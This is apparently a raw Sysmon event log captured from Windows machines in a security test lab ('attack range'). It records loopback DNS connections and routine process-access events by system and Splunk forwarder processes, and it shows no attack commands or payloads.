14:16:46.737{00000000-0000-0000-0000-000000000000}2256<unknown process>-udptruefalse127.0.0.1-53170-false127.0.0.1-53domain 354300x8000000000000000205058Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.736{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53169- 354300x8000000000000000205057Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.736{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53169- 354300x8000000000000000205056Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.633{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53168- 354300x8000000000000000205055Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.632{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53168- 354300x8000000000000000205054Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.632{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53167- 354300x8000000000000000205053Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.632{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53167- 354300x8000000000000000205052Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.632{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53166- 354300x8000000000000000205051Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.632{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53166- 354300x8000000000000000205050Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.556{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53165- 354300x8000000000000000205049Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.556{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53165- 354300x8000000000000000205048Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.556{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53164- 354300x8000000000000000205047Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.556{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53164- 354300x8000000000000000205046Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.555{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53163- 354300x8000000000000000205045Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.555{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53163- 354300x8000000000000000205044Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.458{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-53162- 354300x8000000000000000205043Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.378{00000000-0000-0000-0000-000000000000}2192<unknown process>-udpfalsefalse127.0.0.1-53159-false127.0.0.1-53domain 354300x8000000000000000205042Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.377{00000000-0000-0000-0000-000000000000}2192<unknown process>-udptruefalse127.0.0.1-53159-false127.0.0.1-53domain 354300x8000000000000000205041Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.377{00000000-0000-0000-0000-000000000000}2192<unknown process>-udpfalsefalse127.0.0.1-53158-false127.0.0.1-53domain 354300x8000000000000000205040Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.377{00000000-0000-0000-0000-000000000000}2192<unknown process>-udptruefalse127.0.0.1-53158-false127.0.0.1-53domain 354300x8000000000000000205039Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.377{00000000-0000-0000-0000-000000000000}2192<unknown process>-udpfalsefalse127.0.0.1-53157-false127.0.0.1-53domain 354300x8000000000000000205038Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.377{00000000-0000-0000-0000-000000000000}2192<unknown process>-udptruefalse127.0.0.1-53157-false127.0.0.1-53domain 354300x8000000000000000205037Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.263{00000000-0000-0000-0000-000000000000}7084<unknown process>-udpfalsefalse127.0.0.1-53156-false127.0.0.1-53domain 354300x8000000000000000205036Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.263{00000000-0000-0000-0000-000000000000}7084<unknown process>-udptruefalse127.0.0.1-53156-false127.0.0.1-53domain 354300x8000000000000000205035Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.263{00000000-0000-0000-0000-000000000000}7084<unknown process>-udpfalsefalse127.0.0.1-53155-false127.0.0.1-53domain 354300x8000000000000000205034Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.263{00000000-0000-0000-0000-000000000000}7084<unknown process>-udptruefalse127.0.0.1-53155-false127.0.0.1-53domain 354300x8000000000000000205033Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.263{00000000-0000-0000-0000-000000000000}7084<unknown process>-udpfalsefalse127.0.0.1-53154-false127.0.0.1-53domain 354300x8000000000000000205032Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.263{00000000-0000-0000-0000-000000000000}7084<unknown process>-udptruefalse127.0.0.1-53154-false127.0.0.1-53domain 354300x8000000000000000205031Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.170{00000000-0000-0000-0000-000000000000}4348<unknown process>-udpfalsefalse127.0.0.1-53153-false127.0.0.1-53domain 354300x8000000000000000205030Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.169{00000000-0000-0000-0000-000000000000}4348<unknown process>-udptruefalse127.0.0.1-53153-false127.0.0.1-53domain 354300x8000000000000000205029Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.998{00000000-0000-0000-0000-000000000000}6404<unknown process>-udptruefalse127.0.0.1-53147-false127.0.0.1-53domain 354300x8000000000000000205028Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.937{00000000-0000-0000-0000-000000000000}4204<unknown process>-udpfalsefalse127.0.0.1-53146-false127.0.0.1-53domain 354300x8000000000000000205027Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.937{00000000-0000-0000-0000-000000000000}4204<unknown process>-udptruefalse127.0.0.1-53146-false127.0.0.1-53domain 354300x8000000000000000205026Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.937{00000000-0000-0000-0000-000000000000}4204<unknown process>-udpfalsefalse127.0.0.1-53145-false127.0.0.1-53domain 354300x8000000000000000205025Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.937{00000000-0000-0000-0000-000000000000}4204<unknown process>-udptruefalse127.0.0.1-53145-false127.0.0.1-53domain 354300x8000000000000000205024Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.936{00000000-0000-0000-0000-000000000000}4204<unknown process>-udpfalsefalse127.0.0.1-53144-false127.0.0.1-53domain 354300x8000000000000000205023Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.936{00000000-0000-0000-0000-000000000000}4204<unknown process>-udptruefalse127.0.0.1-53144-false127.0.0.1-53domain 354300x8000000000000000205022Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.867{00000000-0000-0000-0000-000000000000}5584<unknown process>-udpfalsefalse127.0.0.1-53143-false127.0.0.1-53domain 354300x8000000000000000205021Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.867{00000000-0000-0000-0000-000000000000}5584<unknown process>-udptruefalse127.0.0.1-53143-false127.0.0.1-53domain 354300x8000000000000000205020Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.867{00000000-0000-0000-0000-000000000000}5584<unknown process>-udpfalsefalse127.0.0.1-53142-false127.0.0.1-53domain 354300x8000000000000000205019Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.867{00000000-0000-0000-0000-000000000000}5584<unknown process>-udptruefalse127.0.0.1-53142-false127.0.0.1-53domain 354300x8000000000000000205018Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.867{00000000-0000-0000-0000-000000000000}5584<unknown process>-udpfalsefalse127.0.0.1-53141-false127.0.0.1-53domain 354300x8000000000000000205017Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.866{00000000-0000-0000-0000-000000000000}5584<unknown process>-udptruefalse127.0.0.1-53141-false127.0.0.1-53domain 354300x8000000000000000205016Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.798{00000000-0000-0000-0000-000000000000}7476<unknown process>-udpfalsefalse127.0.0.1-53140-false127.0.0.1-53domain 354300x8000000000000000205015Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.798{00000000-0000-0000-0000-000000000000}7476<unknown process>-udptruefalse127.0.0.1-53140-false127.0.0.1-53domain 354300x8000000000000000205014Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.798{00000000-0000-0000-0000-000000000000}7476<unknown process>-udpfalsefalse127.0.0.1-53139-false127.0.0.1-53domain 354300x8000000000000000205013Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.798{00000000-0000-0000-0000-000000000000}7476<unknown process>-udptruefalse127.0.0.1-53139-false127.0.0.1-53domain 354300x8000000000000000205012Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.798{00000000-0000-0000-0000-000000000000}7476<unknown process>-udpfalsefalse127.0.0.1-53138-false127.0.0.1-53domain 354300x8000000000000000205011Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.798{00000000-0000-0000-0000-000000000000}7476<unknown process>-udptruefalse127.0.0.1-53138-false127.0.0.1-53domain 354300x8000000000000000205010Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.736{00000000-0000-0000-0000-000000000000}1492<unknown process>-udpfalsefalse127.0.0.1-53137-false127.0.0.1-53domain 354300x8000000000000000205009Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.736{00000000-0000-0000-0000-000000000000}1492<unknown process>-udptruefalse127.0.0.1-53137-false127.0.0.1-53domain 354300x8000000000000000205008Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.663{00000000-0000-0000-0000-000000000000}7836<unknown process>-udpfalsefalse127.0.0.1-53135-false127.0.0.1-53domain 354300x8000000000000000205007Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.663{00000000-0000-0000-0000-000000000000}7836<unknown process>-udptruefalse127.0.0.1-53135-false127.0.0.1-53domain 354300x8000000000000000205006Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.663{00000000-0000-0000-0000-000000000000}7836<unknown process>-udpfalsefalse127.0.0.1-53134-false127.0.0.1-53domain 23542300x800000000000000043987Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:48.875{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=48C956BA1C29665E20E0EA54BC5EDD6C,SHA256=02076AD96CE0BEE2B2DF3A3E95BEC8623D117F24884AC902DB217F589CF1C829,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000043986Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:48.562{0A5DF930-17D0-629A-0E07-000000006002}35841572C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043985Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:48.406{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-17D0-629A-0E07-000000006002}3584C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043984Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:48.406{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043983Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:48.406{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043982Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:48.406{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043981Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:48.406{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043980Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:48.406{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043979Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:48.406{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043978Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:48.406{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043977Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:48.406{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043976Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:48.406{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043975Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:48.406{0A5DF930-E35B-6299-0500-000000006002}4121840C:\Windows\system32\csrss.exe{0A5DF930-17D0-629A-0E07-000000006002}3584C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000043974Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:48.406{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-17D0-629A-0E07-000000006002}3584C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000043973Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:48.408{0A5DF930-17D0-629A-0E07-000000006002}3584C:\Program 